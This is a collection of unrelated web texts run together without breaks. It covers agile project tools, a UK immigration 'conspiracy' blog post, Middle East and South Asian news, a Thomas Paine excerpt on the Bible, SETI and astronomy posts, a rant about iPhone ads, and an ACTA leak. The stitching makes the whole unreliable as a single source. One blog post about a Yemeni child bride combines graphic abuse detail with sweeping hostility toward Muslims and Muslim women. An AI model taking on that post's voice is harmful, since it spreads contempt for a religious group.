You can assign colored Labels to cards to facilitate grouping and filtering , additionally you can add members to a card , for example to assign a task to someone .
Winds of Scrum
Winds of Scrum is a web - based open source Scrum agile project management tool .
It allows drag and drop sprint backlog assignation .
It is based on Henrik Kniberg 's book " Scrum and XP from the Trenches " available at InfoQ .
It allows also to drag and drop sprint backlog assignation .
XP Studio
A complete software development environment in which to practice eXtreme Programming ( XP ) or other Agile software development methodologies .
XPlanner +
XPlanner + is a web - based project planning and tracking tool .
Zentao
Zentao is a free open source project management tool that supports Agile Scrum and Waterfall project management .
Zentao include product management ( products , stories , plan , releases and roadmaps ) and project management ( projects , tasks , teams , builds and burndown charts ) features .
This tool has also a commercial online hosted version .
Zentao - Scrum Burndown Chart
Members of a Conspiracy ?
Us ?
We have recently touched upon the thorny issue of the driving mechanisms underlying global migration into the Eurosphere , into the EU and into Britain in particular .
It ’s probably fair to say that there are two main schools of thought on the matter : the Conspiracy Theorists and the Cock - up Crowd .
As it happens the BBC has just re-opened the public debate into the question with a programme aired on Radio Four earlier this week : Analysis : Foreigner Policy , hosted by David Goodhart , the estimable editor of the ‘ progressive ’ magazine Prospect .
The recording is available in the BBC iPlayer , and a full transcript can be downloaded from here .
If possible , a listen to the broadcast is recommended , since this conveys far more information than the bare transcript .
Sharp intakes of breath , nervous giggles , bombastic defensiveness and oily evasiveness are all easy to detect with a little close listening .
Goodhart interviews a number of leading industry luminaries including Tim Finch of the IPPR [ “ The most dangerous organisation in Britain – Dan Dare ] and Sarah Spencer of taxpayer - funded pro-migration ‘ research ’ unit Oxford Compas .
Most intriguingly , Goodhart also gives an airing to Andrew Neather , the former Labour policy wonk whose revelations about NuLabor ’s alleged plan to import a new , ethnically - diverse electorate caused such a stir a few months ago .
The programme certainly starts out with the intention of exposing a possible conspiracy , if one existed .
Indeed the station announcer introduces the documentary with the question “ Did Labour pursue an immigration policy deliberately intended to increase diversity ? ”
After reviewing the evidence presented , however , Goodhart dismisses the allegation and suggests instead that the migration boom under the Labour regime was not the outcome of an ideological crusade , but rather the result of misguided economic imperatives , general liberal sensibilities and straightforward bureaucratic bungling .
A cock - up it is then .
Or a cover -up ?
Jerusalem ( CNN ) -- Israeli Defense Minister Ehud Barak has ordered the army to seal off the West Bank for 48 hours and tightened security around the old city of Jerusalem , Israeli officials said Friday .
One Palestinian was injured in the old city after Israeli police restricted worshipers from entering the Al Aqsa mosque for Friday prayers .
The closing of the West Bank follows Israel 's controversial announcement this week that it plans to build 1,600 new apartments on land in Jerusalem claimed by both Israel and the Palestinians .
The restriction began at midnight Thursday and will be lifted at midnight Saturday , " in accordance with security assessments , " the Israel Defense Forces said .
Medical workers and patients , religious workers , teachers , humanitarian workers , and journalists will still be permitted to enter and leave the West Bank , the IDF said .
It also promised that trade would still operate as normal .
Security in and around the old city in Jerusalem was also tight Friday .
Police spokesman Micky Rosenfeld said there was extensive deployment of police in largely Arab East Jerusalem in order to prevent the development of riots .
Worshipers younger than 50 and women of any age were not being allowed to attend Friday prayers at the Al Aqsa mosque , one of the city 's holiest sites , Rosenfeld said .
Police were stationed at a number of points around the compound known to Jews as the Temple Mount and to Muslims as Haram - al - Sharif , police said .
People prayed in the streets around entrances to the old city after police prevented them from entering the mosque .
Palestinian medics evacuated one injured man and said he had been hit in the head with an Israeli police baton .
Last week , dozens were hurt during clashes around the mosque , and police used tear gas and rubber bullets against protesters .
That violence was sparked by Palestinian opposition to Israel 's decision to place two religious shrines in the West Bank on a list of Zionist heritage .
CNN 's Kevin Flower and Guy Azriel contributed to this report .
These books , beginning with Genesis and ending with Revelations , ( which , by the bye , is a book of riddles that requires a revelation to explain it ) are , we are told , the word of God .
It is , therefore , proper for us to know who told us so , that we may know what credit to give to the report .
The answer to this question is , that nobody can tell , except that we tell one another so .
The case , however , historically appears to be as follows :
When the church mythologists established their system , they collected all the writings they could find , and managed them as they pleased .
It is a matter altogether of uncertainty to us whether such of the writings as now appear under the name of the Old and the New Testament , are in the same state in which those collectors say they found them ; or whether they added , altered , abridged , or dressed them up .
Be this as it may , they decided by vote which of the books out of the collection they had made , should be the Word of God , and which should not .
They rejected several ; they voted others to be doubtful , such as the books called the Apocrypha ; and those books which had a majority of votes , were voted to be the word of God .
Had they voted otherwise , all the people since calling themselves Christians had believed otherwise ; for the belief of the one comes from the vote of the other .
Who the people were that did all this , we know nothing of .
They call themselves by the general name of the Church ; and this is all we know of the matter .
As we have no other external evidence or authority for believing these books to be the word of God , than what I have mentioned , which is no evidence or authority at all , I come , in the next place , to examine the internal evidence contained in the books themselves .
In the former part of this essay , I have spoken of revelation .
I now proceed further with that subject , for the purpose of applying it to the books in question .
Revelation is a communication of something , which the person , to whom that thing is revealed , did not know before .
For if I have done a thing , or seen it done , it needs no revelation to tell me I have done it , or seen it , nor to enable me to tell it , or to write it .
Revelation , therefore , cannot be applied to anything done upon earth of which man is himself the actor or the witness ; and consequently all the historical and anecdotal part of the Bible , which is almost the whole of it , is not within the meaning and compass of the word revelation , and , therefore , is not the word of God .
When Samson ran off with the gate - posts of Gaza , if he ever did so , ( and whether he did or not is nothing to us , ) or when he visited his Delilah , or caught his foxes , or did anything else [ 1 ] , what has revelation to do with these things ?
If they were facts , he could tell them himself ; or his secretary , if he kept one , could write them , if they were worth either telling or writing ; and if they were fictions , revelation could not make them true ; and whether true or not , we are neither the better nor the wiser for knowing them .
When we contemplate the immensity of that Being , who directs and governs the incomprehensible WHOLE , of which the utmost ken of human sight can discover but a part , we ought to feel shame at calling such paltry stories the word of God .
As to the account of the creation , with which the book of Genesis opens , it has all the appearance of being a tradition which the Israelites had among them before they came into Egypt ; and after their departure from that country , they put it at the head of their history , without telling , as it is most probable that they did not know , how they came by it .
The manner in which the account opens , shows it to be traditionary .
It begins abruptly .
It is nobody that speaks .
It is nobody that hears .
It is addressed to nobody .
It has neither first , second , nor third person .
It has every criterion of being a tradition .
It has no voucher .
Moses does not take it upon himself by introducing it with the formality that he uses on other occasions , such as that of saying , " The Lord spake unto Moses , saying . "
Why it has been called the Mosaic account of the creation , I am at a loss to conceive .
Moses , I believe , was too good a judge of such subjects to put his name to that account .
He had been educated among the Egyptians , who were a people as well skilled in science , and particularly in astronomy , as any people of their day ; and the silence and caution that Moses observes , in not authenticating the account , is a good negative evidence that he neither told it nor believed it .
—The case is , that every nation of people has been world - makers , and the Israelites had as much right to set up the trade of world - making as any of the rest ; and as Moses was not an Israelite , he might not chuse to contradict the tradition .
The account , however , is harmless ; and this is more than can be said for many other parts of the Bible .
Whenever we read the obscene stories , the voluptuous debaucheries , the cruel and torturous executions , the unrelenting vindictiveness , with which more than half the Bible [ 2 ] is filled , it would be more consistent that we called it the word of a demon , than the Word of God .
It is a history of wickedness , that has served to corrupt and brutalize mankind ; and , for my own part , I sincerely detest it , as I detest everything that is cruel .
We scarcely meet with anything , a few phrases excepted , but what deserves either our abhorrence or our contempt , till we come to the miscellaneous parts of the Bible .
In the anonymous publications , the Psalms , and the Book of Job , more particularly in the latter , we find a great deal of elevated sentiment reverentially expressed of the power and benignity of the Almighty ; but they stand on no higher rank than many other compositions on similar subjects , as well before that time as since .
The Proverbs which are said to be Solomon's , though most probably a collection , ( because they discover a knowledge of life , which his situation excluded him from knowing ) are an instructive table of ethics .
They are inferior in keenness to the proverbs of the Spaniards , and not more wise and economical than those of the American Franklin .
All the remaining parts of the Bible , generally known by the name of the Prophets , are the works of the Jewish poets and itinerant preachers , who mixed poetry , anecdote , and devotion together — and those works still retain the air and style of poetry , though in translation . [ 3 ]
There is not , throughout the whole book called the Bible , any word that describes to us what we call a poet , nor any word that describes what we call poetry .
The case is , that the word prophet , to which a later times have affixed a new idea , was the Bible word for poet , and the word prophesying meant the art of making poetry .
It also meant the art of playing poetry to a tune upon any instrument of music .
We read of prophesying with pipes , tabrets , and horns — of prophesying with harps , with psalteries , with cymbals , and with every other instrument of music then in fashion .
Were we now to speak of prophesying with a fiddle , or with a pipe and tabor , the expression would have no meaning , or would appear ridiculous , and to some people contemptuous , because we have changed the meaning of the word .
We are told of Saul being among the prophets , and also that he prophesied ; but we are not told what they prophesied , nor what he prophesied .
The case is , there was nothing to tell ; for these prophets were a company of musicians and poets , and Saul joined in the concert , and this was called prophesying .
The account given of this affair in the book called Samuel , is , that Saul met a company of prophets ; a whole company of them !
coming down with a psaltery , a tabret , a pipe , and a harp , and that they prophesied , and that he prophesied with them .
But it appears afterwards , that Saul prophesied badly , that is , he performed his part badly ; for it is said that an " evil spirit from God [ 4 ] came upon Saul , and he prophesied . "
Now , were there no other passage in the book called the Bible , than this , to demonstrate to us that we have lost the original meaning of the word prophesy , and substituted another meaning in its place , this alone would be sufficient ; for it is impossible to use and apply the word prophesy , in the place it is here used and applied , if we give to it the sense which later times have affixed to it .
The manner in which it is here used strips it of all religious meaning , and shews that a man might then be a prophet , or he might prophesy , as he may now be a poet or a musician , without any regard to the morality or the immorality of his character .
The word was originally a term of science , promiscuously applied to poetry and to music , and not restricted to any subject upon which poetry and music might be exercised .
Deborah and Barak are called prophets , not because they predicted anything , but because they composed the poem or song that bears their name , in celebration of an act already done .
David is ranked among the prophets , for he was a musician , and was also reputed to be ( though perhaps very erroneously ) the author of the Psalms .
But Abraham , Isaac , and Jacob are not called prophets ; it does not appear from any accounts we have , that they could either sing , play music , or make poetry .
We are told of the greater and the lesser prophets .
They might as well tell us of the greater and the lesser God ; for there cannot be degrees in prophesying consistently with its modern sense .
But there are degrees in poetry , and therefore the phrase is reconcilable to the case , when we understand by it the greater and the lesser poets .
It is altogether unnecessary , after this , to offer any observations upon what those men , styled prophets , have written .
The axe goes at once to the root , by showing that the original meaning of the word has been mistaken , and consequently all the inferences that have been drawn from those books , the devotional respect that has been paid to them , and the laboured commentaries that have been written upon them , under that mistaken meaning , are not worth disputing about .
—- In many things , however , the writings of the Jewish poets deserve a better fate than that of being bound up , as they now are , with the trash that accompanies them , under the abused name of the Word of God .
If we permit ourselves to conceive right ideas of things , we must necessarily affix the idea , not only of unchangeableness , but of the utter impossibility of any change taking place , by any means or accident whatever , in that which we would honour with the name of the Word of God ; and therefore the Word of God can not exist in any written or human language .
The continually progressive change to which the meaning of words is subject , the want of an universal language which renders translation necessary , the errors to which translations are again subject , the mistakes of copyists and printers , together with the possibility of wilful alteration , are of themselves evidences that human language , whether in speech or in print , cannot be the vehicle of the Word of God . —- The Word of God exists in something else . [ 5 ]
Did the book called the Bible excel in purity of ideas and expression all the books now extant in the world , I would not take it for my rule of faith , as being the Word of God ; because the possibility would nevertheless exist of my being imposed upon .
But when I see throughout the greatest part of this book scarcely anything but a history of the grossest vices , and a collection of the most paltry and contemptible tales , I can not dishonour my Creator by calling it by his name .
**** UPDATE April10,2010 - Dead Yemeni Child Bride Tied - up and raped
" A 13 - year - old Yemeni child bride who bled to death shortly after marriage was tied down and forced to have sex by her husband , according to interviews with the child 's mother , police and medical reports .
The girl 's mother , Nijma Ahmed , 50 , told the Associated Press that before her daughter lost consciousness , she said that her husband had tied her up and forced himself on her .
" She looked like she was butchered , " she said about her daughter 's injuries .
A forensic report obtained by the AP showed that Assi's injuries were much more extensive , including extensive tearing around the vagina and rectum
Original Post :
There are all types of animals on this Earth - some walk on two legs and some walk on four but a man who would take a little girl and repeatedly force himself sexually on her and into her until her reproductive organs ruptured causing her to haemorrhage to death - is not a man - he is a monster who slithers on his belly making even poisonous snakes look good .
He is the ultimate sorry excuse for a man as real men want to defend and care for children - not rape them .
A man who has sex with a child is a paedophile no matter what country he lives in no matter what religion he spouts and no matter what religious book he hides under .
Muslim apologists need not spout their multicultural claptrap at me - or at the now dead girl - who 's young life was snuffed out by a barbarian that would not control his perverted morals or genitals .
Muslim women and their Western anthopologist cheerleaders are also to blame .
Yemen saw fit to recently propose a law banning child marriage .
So what happened ?
Women marched in the streets - using the symbolic act of holding their Qur'an 's over their heads - protesting the new law .
Sorry ladies but you can't hide under the Qur'an on this .
Undoubtedly these are the same women who tie down their granddaughters , daughters & nieces and have a ' cutter ' slice off the little girl 's external genitalia - female genital mutilation .
( Yemen parliament refused to ban female circumcision ) thus leaving it up to little girl 's to stand up for their rights .
Too bad 13 year old , Ilham Mahdi al - Assi , did n't have a Qur'an to hide under or to use to pummel the child rapist she was forced to marry -- instead of being forced to endure horrific physical and emotional torture .
This death is totally outrageous and completely preventable yet even Western countries in efforts to pander to muslims - on every level - spout alot of crap about forced marriage being bad yet are there laws to specifically criminalize it .
?
NO !
Is n't it true that tales of forced marriage are not short of becoming commonplace in England / Great Britain / Europe ?
How long will it be before we pick up a newspaper or turn on the telly and read or see a story about genital mutilation or forced marriage which often leads to child rape and not even raise an eyebrow ?
How long before we are standing - with that rapidly growing crowd - hiding under the Qur'an ?
Article in full :
These women are protesting against the law banning child marriage
Report 13 - year - old bride dies five days after her wedding when suffering rupture in her sex organs , haemorrhaging .
SANAA - A 13 - year - old Yemeni girl who had been forced into marriage died five days after her wedding when she suffered a rupture in her sex organs and haemorrhaging , a local right 's organisation said Thursday .
Ilham Mahdi al - Assi died on Friday in al - Thawra hospital , in Hajja province north of the capital , the Shaqaeq Arab Forum for Human Rights said in a statement quoting a medical report .
She was wedded on Monday in a traditional arrangement known as " swap marriage " in which the brother of the bride also married the sister of the groom , it said .
" The child Ilham has died as a martyr due to the abuse of children 's lives in Yemen , " the non-governmental organisation said .
Her death is a " flagrant example " of the results of opposing the ban on child marriage in Yemen , which is leading to " killing child females , " it said .
The marriage of young girls is widespread in Yemen which has a strong tribal structure .
The death of a 12 - year - old girl in childbirth in September illustrated the case of the country 's " brides of death , " many of whom are married off even before puberty .
Controversy has heightened in Yemen recently over a law banning child marriage in the impoverished country through setting a minimum age of 17 for women and 18 for men .
Thousands of conservative women demonstrated outside parliament last month answering a call by Islamist parties opposing the law .
A lesser number of women rallied at the same venue a few days later in support of the law , whose implementation is blocked pending a request by a group of MPs for a review , although it had passed last year in the chamber .
--------------------------------------------------------------------------------
Will this soon be happening in our country ?
The government expects to have issued 17 million ID cards by 2017 , Home Secretary Alan Johnson told the Commons yesterday .
Johnson was responding to a question from his Tory shadow , Chris Grayling , who asked : " What proportion of the estimated 49 million products to be issued between April 2012 and March 2017 ... will be identity cards ? "
Johnson replied : " Approximately 49 million products will be issued over the period April 2012 to March 2017 of which we expect approximately 32 million passports and 17 million identity cards . "
These would n't necessarily all be different IDs , so to speak , with some accounted for by replacements of lost or stolen cards and passports .
Johnson reminded Grayling that people would be able to buy an ID card or passport or both .
" As such , the product mix of identity cards and passports depends on a number of factors including : the economic environment ; the relative cost of the products to the public ; and travel patterns , all of which can vary over time . "
Some observers may be amazed that the government expects to issue 17 million ID cards by 2017 - this would account for roughly 28 per cent of the UK population .
The government 's own figures show just a trickle of people able to apply for an ID card pursuing the option , with the government itself yet to decide whether to proceed with the roll out of further " enrolment centres " .
On the run rates seen in its pilot area of Manchester , it would take at best over a century to get the whole of the population signed up to the scheme .
But as Reg readers have pointed out , by forcing ID exchange into more and more transactions - buying booze , getting into clubs , getting cops to leave you alone - the government appears to be relying putting the squeeze on youngsters and simply grinding down the rest of us . ®
Selections from the Forbes Library Archives
In celebration of Forbes Library ’s 125th anniversary year ( 2019 ) , a variety of images and objects from the Library ’s local history collections were featured in the Hosmer Gallery alongside the work of contemporary local artists .
These displays will be preserved as online exhibits .
January : Forbes and Calvin Coolidge
February : People at Work
March : Women of Forbes Library
April : The Gregory Wilson Postcard Collection
June : H.E Robbins handcolored wildflower prints
July : Everyday life in 1894 Northampton
August : Posters
September : Children and Education
ISLAMABAD : A Hindu priest committed suicide after killing his three minor daughters , all under 6 - year - old , to please Hindu goddess Kali Mata in Bhemomal area of Sind province on Tuesday .
According to police and eyewitnesses , religious rituals were regularly performed at the Kali Mata Temple established on the first floor of a house owned by Tekam Das Meghwar in Bhemomal .
Reports say that Tekam Das Meghwar first slaughtered his three daughters , Parwati , 6 - year - old , Reena , 4 , and Aarti , 1 , with a sharp knife and then slit his own throat to make Kali Mata happy .
Moulchand , brother of deceased Tekam Das Meghwar said , “ My deceased brother was Hindu priest of Kali Mata and he performed pooja the whole night but in the early morning when power supply failed he slaughtered his three daughters before committing suicide with a sharp weapon . ”
SHO Taluka police Rasool Bux
Thaheem told media that after post mortem the bodies of the three sisters and their father were handed over to their heirs .
Initial police investigation suggested that Tekam Das Meghwar , early on Tuesday morning , entered the residential portion of the house , asking his wife , Pavi , to bring milk from a nearby shop .
Investigators believe that taking advantage of solitary Tekam Das slit throats of his three daughters .
The ill - fated mother told police that " when I returned home , I saw heads of three girls in a cradle placed in room .
Body of Tekam Das also lay in a pool of blood with his throat slit . "
She started screaming on which neighbours rushed to the house .
Another Hindu priest Bhagat Ashok told media that act of Tekam Das was foolish and it was illegal to offer sacrifice of even animals in Hindu religion .
The incident spread panic in the town of Mirwah Gorchani as hundreds of people gathered at the spot .
Notes & Queries 4/8/10
Project Ozma ’s Anniversary
It was just fifty years ago today , April 8 , 1960 , when Frank Drake launched Project Ozma by turning the Green Bank , WV dish toward Tau Ceti .
In a reminiscence of the project written for Cosmic Search magazine , Drake recalls the initial sense of anticipation , followed by examination of the chart recorder , which returned nothing but noise .
When Tau Ceti set in the west , Drake and team pointed the telescope at Epsilon Eridani .
Let Drake tell it :
A few minutes went by .
And then it happened .
Wham !
Suddenly the chart recorder started banging off scale .
We heard bursts of noise coming out of the loudspeaker eight times a second , and the chart recorder was banging against its pin eight times a second .
We had never seen anything like this before in all the previous observing at Green Bank .
We all looked at each other wide - eyed .
Could it be this easy ?
Some people had even predicted that the most rational extraterrestrial signal would be a slow series of pulses , as that would be evidence of intelligent origin .
( No one had any idea about the existence of pulsars then . )
An exciting moment , and one that led to further debate :
Suddenly I realized that there had been a flaw in our planning .
We had thought the detection of a signal so unlikely that we had never planned what to do if a clear signal was actually received .
Almost simultaneously everyone in the room asked “ What do we do now ? ” Change the frequency ?
Well , the most likely source of a spurious signal was the earth , and we could check that out by moving the telescope off the star and seeing if the signal went away .
So we proceeded to do that , and as we moved off the star , sure enough the signal went away .
So we pointed back at the star .
The signal did not come back .
Wow .
Was it really from the star , or had it been from earth and had it turned off about the time we moved off the star ?
There was no way to know .
And there was all that adrenaline flowing and no way to apply all that excitement and energy in a useful way .
Image : The Howard Tatel Radio Telescope at the National Radio Astronomy Observatory , Green Bank WV .
SETI pioneer Dr. Frank Drake used this 85 foot diameter antenna for Project Ozma , the first modern microwave search for intelligent extra-terrestrial signals , in 1960 .
Credit : SETI League .
It was about ten days later , with newspaper reporters already asking about the unusual signal , that the Project Ozma team was able to determine that the noise was man-made radio interference .
Drake persevered , and from April to July the 26 - meter NRAO radio telescope studied the 21 - centimeter emission line ( 1420 MHz ) of cold hydrogen , looking for the kind of patterned pulses that would reveal intelligence .
No unusual signals turned up , but Drake had set the era of modern SETI detection attempts in motion .
A second Ozma project was managed by Benjamin Zuckerman and Patrick Palmer starting in 1973 , also at Green Bank , surveying about 650 stars during a four - year period with the same result as the original .
Interlacing Art and Science
Those of you in the New York area will want to take advantage of a panel on art and astronomy that will be held tonight at Central Booking in Brooklyn ( 111 Front St. , Gallery 210 ) .
Interstellar flight specialist Greg Matloff and the artist C Bangs will be on the panel , along with Denton Ebel ( American Museum of Natural History ) and Ari Maller ( New York City College of Technology ) .
I ’m just finishing Matloff and Bangs ’ new title Paradise Regained : The Regreening of Earth ( Copernicus , 2009 ) , written with NASA ’s Les Johnson .
I ’ll have more on the book in a subsequent post , but for now I ’ll simply mention how C Bangs ’ elegant artwork complements the book ’s central argument , that space resources can help us revive our tired planet .
Image : Message Plaque Rainbow Hologram , by C Bangs .
How do art and science interact ?
From Central Bookings ’ news release :
Human history has been greatly influenced by our collective image of the cosmos .
Today , art and astronomy continue to interact , witness the uproar of the American public when NASA planned to prematurely de-orbit the Hubble Space Telescope .
Many artists have utilized Hubble images and those taken by other modern telescopes .
Conversely , art also influences astronomy .
After the success of the recent movie Avatar , an on - going search for Terrestrial planets circling our near stellar neighbors Alpha Centauri A and B has been dubbed “ the search for Pandora . ”
The universe has been considered to be many things : a divine construction , a machine and a mathematical exercise .
But in his 1937 vintage science - fiction classic Star Maker , British author / philosopher Olaf Stapledon speculates that our cosmos ( and all others ) might be the work of a divine artist .
Bangs ’ work has graced books like Matloff ’s The Starflight Handbook and has appeared in permanent collections including the Library of Congress , NASA Marshall Space Flight Center and the Chrysler Museum .
Matloff continues to explore our prospects for travel both within and without the Solar System in books and scientific papers .
The panel will convene at 6:30 this evening and should be well worth the modest $ 5 entrance fee .
Universe in a Black Hole
Theoretical physicist Nikodem Poplawski describes the gravitational field of a black hole in a new paper in Physics Letters B , modeling the radial geodesic motion of a massive particle into such an object .
Both Schwarzschild and Einstein - Rosen black holes are considered legitimate mathematical solutions of General Relativity , but in both cases , we can see only the outside of a black hole , leading Poplawski to question whether our universe might be itself inside a wormhole associated with a black hole within a much larger universe .
This is mind - bending stuff , and I can only quote the author :
“ This condition would be satisfied if our universe were the interior of a black hole existing in a bigger universe .
Because Einstein ’s general theory of relativity does not choose a time orientation , if a black hole can form from the gravitational collapse of matter through an event horizon in the future then the reverse process is also possible .
Such a process would describe an exploding white hole : matter emerging from an event horizon in the past , like the expanding universe . ”
Are astrophysical black holes concealing universes that formed when the black holes themselves did ?
The concept is that a white hole is connected to a black hole by a wormhole — an Einstein - Rosen bridge — and the new paper suggests that all black holes in our cosmos may contain such wormholes .
One intriguing possibility is that such a theory might help us resolve problems with black hole information loss , the notion that all information about matter is lost as it passes over the event horizon .
And it might just help us explain cosmic inflation .
The paper is Poplawski , “ Radial motion into an Einstein - Rosen bridge , ” Physics Letters B , Vol. 687 , Issues 2 - 3 ( 12 April 2010 ) , pp. 110-113 .
Geoff Marcy on Habitable Worlds
With 205 planets already discovered , Geoff Marcy and the California Planet Search team have plenty of accomplishments to look back on , and as Marcy told a recent interviewer , Kepler is working beautifully , offering unprecedented measurements of the stars it ’s monitoring .
The short interview adds to the excitement of future Kepler discoveries , but Marcy is cautious about getting too far out in front of actual science .
Will we find an Earth - like planet soon ?
Marcy :
It ’s presumptuous to predict that Kepler will find Earth - like planets .
We may find that Earths are a dime a dozen or we might find that they are a rare treasure .
We might even find zero Earth - like planets , which would be a spectacular result and suggest that our planet is an extraordinary contradiction to the norm .
If we do find Earth - like planets , it will take more than a year to identify them .
Kepler needs to observe a planet passing in front of its star three times in order to confirm its existence .
For a planet with the same orbit as the Earth , that ’s over three years to wait .
Image : Planet hunter Geoff Marcy .
Credit : University of California at Berkeley .
It ’s good to see this dash of realism , along with the reminder to keep our personal biases out of the search :
I think it ’s important to remain unbiased .
As scientists , we need to make sure to keep an open mind so that we can faithfully report our findings and avoid over - interpreting our data .
We can make mistakes if we want a certain answer badly .
Quality data are most important , so I try to stay calm , vigilant , and self - critical .
A brief look at interplanetary exploration offers plenty of evidence for the value of scientific detachment .
How many times have we been confounded by what our space probes have found , from the volcanoes of Io to the bizarre geysers of Enceladus ?
The good news about Kepler is that the recently reported CCD problem is minor ( Marcy calls it an ‘ inconvenience , ’ nothing more ) , and that we ’re within a few short years of finding answers that will flesh out our understanding of the cosmos and the incidence of terrestrial worlds .
Authorities in the Gulf emirate have given names for 27 alleged members of a team that killed the Palestinian , and said they used fraudulent British , Irish , French , German and Australian passports to enter and leave Dubai .
Make no mistake , iAds are the iPhone user 's worst enemy .
If Buzz Lightyear were at the unveiling , he'd have rocket punched Apple right in the face .
Advertisement
With today 's announcement of iAd , a turnkey solution for developers to add advertisements to their applications , Apple has empowered the small developer to be rewarded ( assumably ) every single time a person uses software — all without building an internal ad sales team of their own .
It 's pretty neat , from a business perspective .
Advertisement
From a user 's perspective , it 's absolutely horrifying .
This point may sound hypocritical .
After all , I write for a major website that makes a lot of money off the ads you see ( and sometimes , ugh , hear ) .
But there are many differences between what Apple is doing and what exists in the advertising world as we know it .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
For one , software has almost always been an ad - free space , a sort of neutral zone in the war for a consumer 's heart and mind .
Aside from a few instances ( like Madden advertising real products on in - game billboards ) , if you bought a piece of software on a cellphone or a PC , it was free from ads .
If you downloaded a free piece of software on the PC , it might have an ad , but usually it was just to get you to buy the software — and it usually did n't sit on the screen at all times .
Advertisement
Which brings me to my second point about why iAds look particularly sinful — even when ads appear on the web ( or most PC - based software ) now , you 're talking about a relatively small image , in terms of overall real estate , that you can escape by scrolling down a page .
That TiVo ad in the upper right hand corner of Gizmodo ?
( You may or may not see it — I have no clue what sort of deal our sales department has cut with them . )
You could fit almost 30 of those ads on the 24 - inch monitor I 'm using right now to read Gizmodo — and I have a second laptop monitor on which I can hold even more information .
But on the iPhone , bar ads ( like we see in iAd ) take up roughly 1/8th of the screen at all times — a screen that 's designed to be tiny so that it can fit in your pocket meaning that most of us struggle to read the thing in the first place .
As far as I 'm concerned , that particular ad is sucking away 1/8th of my experience , jamming its nose in my portal to a device that I paid ( a lot ) to own and use .
1/8th is too much in my book , and it infuriates me that the guy who sold me this phone is the same guy selling someone a means to take part of that phone from me .
Advertisement
By now , some of you think I 'm a grumpy , ranting lunatic .
Some of you think , " Well just do n't use apps that have ads in them , idiot .
Paid apps , for instance , will probably remain ad - free . "
This reasonable response brings me to my third point :
We should n't expect any apps to stay ad - free , at least when keeping history in mind , because Apple has made no restrictions ( that we 've heard about ) to keep ads out of paid apps .
Remember when cable was a safe haven from broadcast ads ?
Then what happened ?
Basically every cable network followed the broadcast advertising model .
Now , we have ads on everything on TV .
And after we learned to skip them , we 've developed ads in our TV — superfluous product references integrated into a storyline for no other purpose than profit .
Advertisement
But there 's a difference between television advertising , in its current state , and Apple pitching every developer on integrating its ad solution .
Apple selling iAds is the equivalent to Sony or Samsung selling part of your TV to advertisers , not a content provider — artists gone businessmen , essentially — like NBC cutting into their own programming to sell you a product and fund said programming .
Advertisement
You see , it 's not that I do n't think anyone should have the right to advertise through my phone .
If NYT puts an ad in their app , I understand .
They constantly generate non-reusable content .
The NYT is not a piece of code that 's written once , like DoodleJump ; it 's a publication that 's built from the ground up every day .
Apple 's already built , shipped and more than funded the iPhone they sold you — in both a for profit sale and the healthy chunk they 're taking from AT&T 's monthly bill .
Now they want part of that phone back — 1/8th to be exact — and they 're pitching every platform developer along with every consumer on the idea .
Advertisement
Hopefully , developers will see " ad - free " as a selling point , and we wo n't be so dim - witted as to be sold on anything less .
It 's a day when the news itself comes with a health warning - beware of stories which turn out not to be true .
But not every weird report is an April Fool .
Here is a round - up of some of the day 's seemingly hoax news stories which are actually true .
Better for you than a bowl of muesli , apparently
1.Coastguards in Falmouth , Cornwall , picked up a distress signal call from a ship named the MV Titanic in the Caribbean .
Three people were on the ship which was taking on water and suffering from electrical failure .
2. Chilli grower Woody Woods , from Grantham , Lincolnshire , is laying claim to the world 's hottest variety of pepper .
Tests carried out by Warwick University rate the Infinity chilli at 1,067,286 on the Scoville Scale , which is used to measure the heat of peppers - hotter than the Bhut Jolokia variety which is used for crowd control by the Indian Army .
3 . Tucking into a fried breakfast of sausages , eggs , bacon , beans , mushrooms , black pudding and tomatoes is a healthier way to start the day than a bowl of cereal , according to a study in the International Journal of Obesity .
4 . The UK 's first sustainable cat food will go on sale later this year , allowing owners to feed felines their favourite fish with a clear conscience .
People are becoming increasingly concerned about sustainability and the provenance of the fish they feed their pets , says Mars Petcare , manufacturers of the new food .
5 . A couple from Devon staged a Flintstone - themed wedding that saw the groom dressed as Fred Flintsone , the bride as Wilma , the best man as Barney Rubble and ... you can guess the rest .
They sealed their vows with the promise " Yabba dabba , I do " .
Grille -ed duck - big on survival instinct
6 . A British van driver who hit two ducks while driving home through Belgium discovered one of them alive , wedged under the bonnet , when he stopped to inspect the damage at a motorway service station on the M1 .
He took the duck to a rescue centre which said it had a broken wing , but should make a good recovery .
7 . A 300 - page book of Gordon Brown 's best speeches , called The Change We Choose ; Speeches 2007 - 2009 , has been published by " popular demand " .
8. Cabin crew who say they are owed up to nine months ' wages by a Spanish airline have posed nude for a calendar to highlight their plight .
9. Etiquette arbiter Debretts is publishing a guide to polite motoring which includes tips such as avoid spraying perfume while in a car and keep conversation light in order to avoid in - car arguments .
10 . Rumours - and so , perhaps , April Fools jokes - spread as rapidly as flu , thanks to a test carried out on the internet .
Researchers from Rome 's La Sapienza University posted a message on Twitter only to see it appear in a newspaper 17 hours later .
Michael Geist sez ,
On the heels of the leak of various country positions on ACTA transparency , today an even bigger leak has hit the Internet .
A new European Union document prepared several weeks ago canvasses the Internet and Civil Enforcement chapters , disclosing in complete detail the proposals from the U.S. , the counter - proposals from the EU , Japan , and other ACTA participants .
The 44 - page document also highlights specific concerns of individual countries on a wide range of issues including ISP liability , anti-circumvention rules , and the scope of the treaty .
This is probably the most significant leak to - date since it goes even beyond the transparency debate by including specific country positions and proposals .
The document highlights significant disagreement on a range of issues .
For example , on the issue of anti-circumvention legislation and access controls , the U.S. wants it included per the DCMA , but many other countries , including the EU , Japan , and New Zealand do not , noting that the WIPO Internet treaties do not require it .
I 've posted brief summary of the key findings , but much more study is needed .
In this stunning interview with Francis Bacon , Melvin Bragg peaks into the mind of the artist with some penetrating questions about existence and reality .
At one point Bragg asks Bacon why he paints “ horror , ” and the artist responds with , “ What horror could I make to compete with the horrors that go on every single day ? ”
We also learn why Bacon is so interested in the mouth , as a human body part .
He says the mouth has “ lovely vibrations of color ” .
This video is a must - see classic .
Learn more about Francis Bacon by visiting these websites :
The Official Site of the Estate of Francis Bacon
Tate Etc. Issue 14 Autumn 2008
This video was found via The Guardian
" My goal is not to make you more powerful than other people , " Eskil Steenberg , the video game developer recently told Kotaku , as he explained which video game design rule he is breaking .
" It is to let you be more respected . "
Advertisement
Eskil Steenberg 's ambitious video game Love , a game he made by himself , officially launches tomorrow .
